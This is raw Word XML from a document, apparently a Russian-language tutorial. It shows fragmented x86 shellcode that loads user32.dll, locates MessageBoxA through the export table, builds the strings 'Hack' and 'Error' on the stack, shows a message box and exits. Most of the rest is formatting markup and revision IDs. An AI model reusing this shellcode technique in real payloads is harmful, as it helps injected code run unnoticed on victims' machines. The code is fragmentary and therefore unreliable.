        <w:t>указатель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"user32.dll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call dword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; LoadLibraryA(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"user32.dll"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esp,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Ch   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убрать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"user32.dll"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но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указатель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— call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уже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вернул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], eax  ; EAX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база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user32.dll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ebx, eax       ; EBX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тоже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=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база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user32 (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для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дальнейшего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парсинга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Найти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MessageBoxA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user32.dll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al,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0x41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shl eax,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mov al,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0x78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shl eax,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mov al,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0x6F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push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0x42656761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0x7373654D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esp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eax, [ebx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eax,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eax,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78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eax,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ecx,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ecx,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ecx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edi,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edi,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edi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edx,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edx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edx, [eax +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.loop2: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edi,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esi,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8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xor ecx, ecx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cld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edi, [edi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edi,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cx,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Ch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repe cmpsb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jz start.found2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inc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cmp eax, edx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jb start.loop2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.found2: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ecx,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mov edx,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movzx eax, word [ecx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eax, [edx + eax*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4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add eax, ebx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mov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add esp,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Ch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MessageBoxA(NULL,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"Hack"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"Error"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MB_OK)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Строим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заголовок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"Error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стеке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mov al,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0x72   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последний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'r'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eax                    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"r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\0\0\0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0x6F727245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"Erro"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→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памяти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"Error\0\0\0"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mov ecx, esp                ; ecx →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"Error"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Строим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текст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"Hack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на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стеке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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660099"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H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48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a=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61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c=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63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k=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B)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eax                    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\0\0\0\0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0x6B636148         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"Hack"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→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памяти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"Hack\0\0\0\0"</w:t>
      </w:r>
      <w:r w:rsidRPr="0044761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mov edx, esp                ; edx →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"Hack"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xor esi, esi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esi                    ; uType = MB_OK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ecx                    ; lpCaption =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"Error"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push edx                    ; lpText    = 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"Hack"</w:t>
      </w:r>
      <w:r w:rsidRPr="0044761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push esi                    ; hWnd = NULL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call dword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32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]         ; MessageBoxA →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после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OK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возвращается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сюда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;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Завершить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процесс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после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закрытия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</w:rPr>
        <w:t>окна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xor eax, eax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push eax                    ; dwExitCode = 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call dword [ebp-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36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         ; ExitProcess(</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612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44761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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79FA73" w14:textId="77777777" w:rsidR="00416838" w:rsidRPr="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00416838" w:rsidRPr="00416838" w:rsidSect="00B87E49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11E35F" w14:textId="77777777" w:rsidR="0070285D" w:rsidRPr="00D60F71" w:rsidRDefault="007028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D72C063" w14:textId="77777777" w:rsidR="0070285D" w:rsidRPr="00D60F71" w:rsidRDefault="007028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60354B21" w:rsidR="00416838" w:rsidRPr="00C53ADA" w:rsidRDefault="00416838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10102B">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>8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50ED53" w14:textId="77777777" w:rsidR="0070285D" w:rsidRPr="00D60F71" w:rsidRDefault="007028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1E7738E" w14:textId="77777777" w:rsidR="0070285D" w:rsidRPr="00D60F71" w:rsidRDefault="0070285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0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4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1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5"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14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8"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="1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4C49"/>
    <w:rsid w:val="00020E11"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="000455F2"/>
    <w:rsid w:val="0005524A"/>
    <w:rsid w:val="00060493"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="0008231D"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000C3128"/>
    <w:rsid w:val="000D3339"/>
    <w:rsid w:val="000D5DB8"/>
    <w:rsid w:val="000E00BE"/>
    <w:rsid w:val="000F4313"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="0010041E"/>
    <w:rsid w:val="0010102B"/>
    <w:rsid w:val="00127358"/>
    <w:rsid w:val="0014248B"/>
    <w:rsid w:val="00144AAF"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00155135"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001662B1"/>
    <w:rsid w:val="0017290F"/>
    <w:rsid w:val="00174C68"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001A6D20"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001D1977"/>
    <w:rsid w:val="001D1AD1"/>
    <w:rsid w:val="001E6E17"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="002014EC"/>
    <w:rsid w:val="0021780B"/>
    <w:rsid w:val="0022168A"/>
    <w:rsid w:val="00233D60"/>
    <w:rsid w:val="00235E5C"/>
    <w:rsid w:val="002378B3"/>
    <w:rsid w:val="002466AB"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00266668"/>
    <w:rsid w:val="00267A3C"/>
    <w:rsid w:val="002737C3"/>
    <w:rsid w:val="002862A4"/>
    <w:rsid w:val="002A1C0F"/>
    <w:rsid w:val="002B4714"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D2224"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002F651D"/>
    <w:rsid w:val="002F77DE"/>
    <w:rsid w:val="00306306"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="003205B6"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00322FF4"/>
    <w:rsid w:val="00324B01"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00344512"/>
    <w:rsid w:val="00364BF2"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="003845C9"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="003852F2"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A2D0A"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003F3080"/>
    <w:rsid w:val="003F38DE"/>
    <w:rsid w:val="004045D1"/>
    <w:rsid w:val="0040669F"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00407203"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="00416838"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00447612"/>
    <w:rsid w:val="0046222A"/>
    <w:rsid w:val="00463870"/>
    <w:rsid w:val="00467900"/>
    <w:rsid w:val="004755F4"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004838AE"/>
    <w:rsid w:val="004863F5"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A635B"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C0774"/>
    <w:rsid w:val="004C4F38"/>
    <w:rsid w:val="004C7F0A"/>
    <w:rsid w:val="004D1F37"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F3DE8"/>
    <w:rsid w:val="004F3F56"/>
    <w:rsid w:val="004F69EC"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00503758"/>
    <w:rsid w:val="005100F0"/>
    <w:rsid w:val="0051244E"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00532CF3"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544A28"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="0054546C"/>
    <w:rsid w:val="00546609"/>
    <w:rsid w:val="00560DEE"/>
    <w:rsid w:val="00573CDC"/>
    <w:rsid w:val="00577D93"/>
    <w:rsid w:val="005B7B90"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D6BC1"/>
    <w:rsid w:val="005E41A0"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E5C52"/>
    <w:rsid w:val="005F2C76"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="0060258B"/>
    <w:rsid w:val="0061144C"/>
    <w:rsid w:val="006125CA"/>
    <w:rsid w:val="00616951"/>
    <w:rsid w:val="00617066"/>
    <w:rsid w:val="00641577"/>
    <w:rsid w:val="00645838"/>
    <w:rsid w:val="00652A77"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="006832D3"/>
    <w:rsid w:val="0069054C"/>
    <w:rsid w:val="006959C1"/>
    <w:rsid w:val="006977CC"/>
    <w:rsid w:val="006A179F"/>
    <w:rsid w:val="006A319E"/>
    <w:rsid w:val="006A3840"/>
    <w:rsid w:val="006B34A4"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006B5D72"/>
    <w:rsid w:val="006C5C34"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D142F"/>
    <w:rsid w:val="006D3E91"/>
    <w:rsid w:val="006E598D"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070285D"/>
    <w:rsid w:val="00704A66"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="007137FD"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00730DB1"/>
    <w:rsid w:val="00740F6B"/>
    <w:rsid w:val="007507C7"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00757506"/>
    <w:rsid w:val="00761928"/>
    <w:rsid w:val="007645C8"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00795A8A"/>
    <w:rsid w:val="007A7E1C"/>
    <w:rsid w:val="007B2865"/>
    <w:rsid w:val="007C32A9"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007C6419"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D0D7F"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007F73D4"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00812A5B"/>
    <w:rsid w:val="0081360D"/>
    <w:rsid w:val="008168B6"/>
    <w:rsid w:val="008229D3"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="00827324"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008323C2"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008534BE"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00882C36"/>
    <w:rsid w:val="008A790C"/>
    <w:rsid w:val="008C27FD"/>
    <w:rsid w:val="008C48F1"/>
    <w:rsid w:val="008C5E20"/>
    <w:rsid w:val="008D1930"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E0313"/>
    <w:rsid w:val="008E11BD"/>
    <w:rsid w:val="008F7785"/>
    <w:rsid w:val="0090367A"/>
    <w:rsid w:val="009061A2"/>
    <w:rsid w:val="00907FD7"/>
    <w:rsid w:val="00910691"/>
    <w:rsid w:val="0091401E"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00920525"/>
    <w:rsid w:val="00921DF8"/>
    <w:rsid w:val="00922ACD"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="009379D7"/>
    <w:rsid w:val="009449CA"/>
    <w:rsid w:val="00944E97"/>
    <w:rsid w:val="00960728"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00964ABE"/>
    <w:rsid w:val="009729A7"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009872D5"/>
    <w:rsid w:val="00994B8B"/>
    <w:rsid w:val="009A6205"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009C09F3"/>
    <w:rsid w:val="009C0BC2"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C62AC"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A02DEC"/>
    <w:rsid w:val="00A112D4"/>
    <w:rsid w:val="00A20237"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A4729B"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A6653F"/>
    <w:rsid w:val="00A7159A"/>
    <w:rsid w:val="00A75A95"/>
    <w:rsid w:val="00A849F9"/>
    <w:rsid w:val="00A96E2A"/>
    <w:rsid w:val="00AA18E4"/>
    <w:rsid w:val="00AB07CB"/>
    <w:rsid w:val="00AB5138"/>
    <w:rsid w:val="00AB6F1C"/>
    <w:rsid w:val="00AC2679"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD28E6"/>
    <w:rsid w:val="00AD7014"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE6B46"/>
    <w:rsid w:val="00AF6569"/>
    <w:rsid w:val="00B06DF1"/>
    <w:rsid w:val="00B114EB"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B13F11"/>
    <w:rsid w:val="00B27B02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B643D"/>
    <w:rsid w:val="00BB739D"/>
    <w:rsid w:val="00BC458C"/>
    <w:rsid w:val="00BC77AB"/>
    <w:rsid w:val="00BE0EE6"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BF3E70"/>
    <w:rsid w:val="00BF5A99"/>
    <w:rsid w:val="00C00F4F"/>
    <w:rsid w:val="00C036FF"/>
    <w:rsid w:val="00C05265"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C35D2F"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C41ABB"/>
    <w:rsid w:val="00C43D41"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C46B13"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C6167D"/>
    <w:rsid w:val="00C660E9"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C852E0"/>
    <w:rsid w:val="00CA10B7"/>
    <w:rsid w:val="00CA471D"/>
    <w:rsid w:val="00CC707F"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CF0BB8"/>
    <w:rsid w:val="00D0522C"/>
    <w:rsid w:val="00D131E0"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D363FD"/>
    <w:rsid w:val="00D368E7"/>
    <w:rsid w:val="00D40160"/>
    <w:rsid w:val="00D41248"/>
    <w:rsid w:val="00D44688"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D56FB0"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D6403C"/>
    <w:rsid w:val="00D730D7"/>
    <w:rsid w:val="00D8289B"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DC4B64"/>
    <w:rsid w:val="00DD50B8"/>
    <w:rsid w:val="00DE61F9"/>
    <w:rsid w:val="00DF15D9"/>
    <w:rsid w:val="00DF7BB9"/>
    <w:rsid w:val="00E0023D"/>
    <w:rsid w:val="00E02D80"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E16544"/>
    <w:rsid w:val="00E2253B"/>
    <w:rsid w:val="00E25232"/>
    <w:rsid w:val="00E25791"/>
    <w:rsid w:val="00E45FA5"/>
    <w:rsid w:val="00E618DD"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E82A25"/>
    <w:rsid w:val="00E969C4"/>
    <w:rsid w:val="00E97AE7"/>
    <w:rsid w:val="00EA3CF2"/>
    <w:rsid w:val="00EB2951"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC773C"/>
    <w:rsid w:val="00ED3623"/>
    <w:rsid w:val="00EE4A8C"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F352F2"/>
    <w:rsid w:val="00F370AC"/>
    <w:rsid w:val="00F401F4"/>
    <w:rsid w:val="00F42412"/>
    <w:rsid w:val="00F46A54"/>
    <w:rsid w:val="00F471B5"/>
    <w:rsid w:val="00F502B3"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F631EC"/>
    <w:rsid w:val="00F66B38"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F81C0F"/>
    <w:rsid w:val="00F82DF4"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB4C79"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC0005"/>
    <w:rsid w:val="00FD28E8"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE2979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2F7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98BFE3-B137-4D1C-8C9B-EE382EF40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3448</Words>
  <Characters>19654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2026-04-12T18:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>